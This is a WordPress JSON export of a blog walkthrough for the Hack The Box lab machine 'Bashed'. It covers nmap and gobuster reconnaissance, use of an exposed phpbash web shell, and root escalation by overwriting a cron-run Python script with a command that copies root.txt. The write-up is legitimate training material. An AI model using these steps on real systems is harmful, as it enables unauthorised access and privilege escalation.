{"id":3717,"date":"2020-08-08T16:33:19","date_gmt":"2020-08-08T07:33:19","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3717"},"modified":"2020-08-30T23:34:41","modified_gmt":"2020-08-30T14:34:41","slug":"hack-the-box-bashed-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3717","title":{"rendered":"Hack The Box &#8211; Bashed &#8211; Walkthrough"},"content":{"rendered":"<h3>Arrexel&#8217;s Development Site is running<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 bashed.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 05:31 UTC\r\nNmap scan report for bashed.htb (10.10.10.68)\r\nHost is up (0.043s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: Arrexel's Development Site\r\n<\/pre>\n<h3>Enumerate directories and files with gobuster<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# gobuster dir -u http:\/\/bashed.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n&#x5B;+] Url:            http:\/\/bashed.htb\r\n&#x5B;+] Threads:        10\r\n&#x5B;+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n&#x5B;+] Status codes:   200,204,301,302,307,401,403\r\n&#x5B;+] User Agent:     gobuster\/3.0.1\r\n&#x5B;+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/08 05:41:13 Starting 
gobuster\r\n===============================================================\r\n\/images (Status: 301)\r\n\/uploads (Status: 301)\r\n\/php (Status: 301)\r\n\/css (Status: 301)\r\n\/dev (Status: 301)\r\n\/js (Status: 301)\r\n\/fonts (Status: 301)\r\n<\/pre>\n<h3>Find phpbash.php and get user.txt<\/h3>\n<p>Accessing the URL below gave me a working shell, and I was able to get user.txt.<br \/>\nhttp:\/\/bashed.htb\/dev\/phpbash.php<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-300x134.png\" alt=\"\" width=\"300\" height=\"134\" class=\"alignnone size-medium wp-image-3718\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-300x134.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-1024x459.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353-768x344.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_145353.png 1085w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Investigating from the shell shows that \/scripts\/test.py is executed every minute<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-300x101.png\" alt=\"\" width=\"300\" height=\"101\" class=\"alignnone size-medium wp-image-3719\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-300x101.png 300w, 
https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-1024x346.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-768x259.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955-1536x518.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_155955.png 2021w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Get root.txt by rewriting test.py<\/h3>\n<p>Prepare to send the file from Kali Linux.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# cat test.py\r\nimport os\r\nos.system(&quot;cat \/root\/root.txt &gt; \/tmp\/root.txt&quot;)\r\n# python -m SimpleHTTPServer 1234\r\nServing HTTP on 0.0.0.0 port 1234 ...\r\n<\/pre>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-300x146.png\" alt=\"\" width=\"300\" height=\"146\" class=\"alignnone size-medium wp-image-3720\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-300x146.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-1024x499.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-768x374.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124-1536x749.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_163124.png 1731w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Arrexel&#8217;s Development Site is running # nmap -A -n -F -T5 bashed.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3717"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717\/revisions"}],"predecessor-version":[{"id":3789,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3717\/revisions\/3789"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}